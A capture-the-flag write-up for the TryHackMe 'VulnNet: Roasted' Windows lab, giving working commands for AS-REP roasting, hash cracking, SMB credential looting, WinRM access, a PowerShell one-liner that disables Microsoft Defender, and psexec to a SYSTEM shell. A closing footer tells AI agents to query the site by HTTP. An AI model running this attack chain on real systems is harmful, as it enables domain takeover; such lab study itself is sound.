# VulnNet: Roasted ## Nmap ``` sudo nmap 10.10.217.198 -p- -sS -sV PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-03 09:12:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49665/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49676/tcp open msrpc Microsoft Windows RPC 49690/tcp open msrpc Microsoft Windows RPC 49705/tcp open msrpc Microsoft Windows RPC Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows ``` ### Rid Brute Force Starting off we find we have guest access to SMB and are able to enumerate users through rid brute forcing with crackmapexec. ``` crackmapexec smb '10.10.217.198' -u 'a' -p '' -d 'vulnnet-rst.local' --rid-brute ``` ![](/files/C0jEX2uDurc8KX3lvw8G) ### ASREP-Roasting With a small list of users we run the discovered usernames against GetNPUsers.py to identify accounts with "No Pre-authentication required" (ASREP Roasting).enabled in Active Directory. ``` GetNPUsers.py 'vulnnet-rst.local'/ -usersfile ~/Desktop/users -dc-ip '10.10.217.198' -format 'hashcat' ``` ![](/files/pjBTcg072vlVu0jMyMFm) ### Cracking the Hash We discover that the user t-skid is ASREP roastable. Using hashcat we are soon able to crack the password hash using the rockyou.txt wordlist. ``` hashcat -a 0 -m 18200 ~/Desktop/hash /usr/share/wordlists/rockyou.txt -O ``` ![](/files/ekm4shtBap7t6fuAU1te) ### SMB enumeration With the new found credentials for the use t-skid we turn back to further SMB enumeration against the target Domain Controller. We find we are able to read within the "Scripts" share and identify the file `ResetPassword.vbs` as a file of interest. ``` smbmap -H '10.10.217.198' -u 't-skid' -p '' -d 'vulnnet-rst.local' -R ``` ![](/files/L6NLyFZDX3IMX1dDkW9H) ### Plain Text Credentials Using smbmap the `.vbs` file is downloaded. Upon reading the code we are able to identify alternative user credentials in plain text. ``` smbmap -H '10.10.217.198' -u 't-skid' -p '' -d 'vulnnet-rst.local' -R -A .vbs ``` ![](/files/8crDX0zZBZyV1vtchgKh) ### Privilege Checking Checking the user access level with crackmapexec we identify the user as being the Domain Administrator. ``` crackmapexec smb '10.10.217.198' -u 'a-whitehat' -p ' -d 'vulnnet-rst.local' -x "whoami /all" ``` ![](/files/RsjAynnOOsvN5dbcBfCR) ### User flag and WinRM With administrative capabilties we are able to login over `WinRM` with Evil-`WinRm`. ``` evil-winrm -i '10.10.217.198' -u 'a-whitehat' -p '' ``` After logging in we successfully obtain the user.txt flag. However, the system.txt flag is off limits. ![](/files/yJWD3XXdXwzU5qMM7OOG) ### Disabling Anti-Virus In order to obtain a SYSTEM shell we will need to ideally run `psexec.py`. Firstly, we need to disable the anti-virus on the target host as otherwise psexec.py will not be able to execute. Run the following command within the `Evil-WinRM` session. ```powershell Set-MpPreference -DisableRealtimeMonitoring $true;Set-MpPreference -DisableIOAVProtection $true;Set-MPPreference -DisableBehaviorMonitoring $true;Set-MPPreference -DisableBlockAtFirstSeen $true;Set-MPPreference -DisableEmailScanning $true;Set-MPPReference -DisableScriptScanning $true;Set-MpPreference -DisableIOAVProtection $true ``` ### Root Flag and System shell After disabling Microsoft Defender we are then able to externally run `psexec.py` to obtain a SYSTEM shell. ``` psexec.py vulnnet-rst.local/a-whitehat:''@'10.10.217.198' ``` ![](/files/v0VkEmlvUBeqBG4GHsgN) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/tryhackme/windows/vulnnet-roasted.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.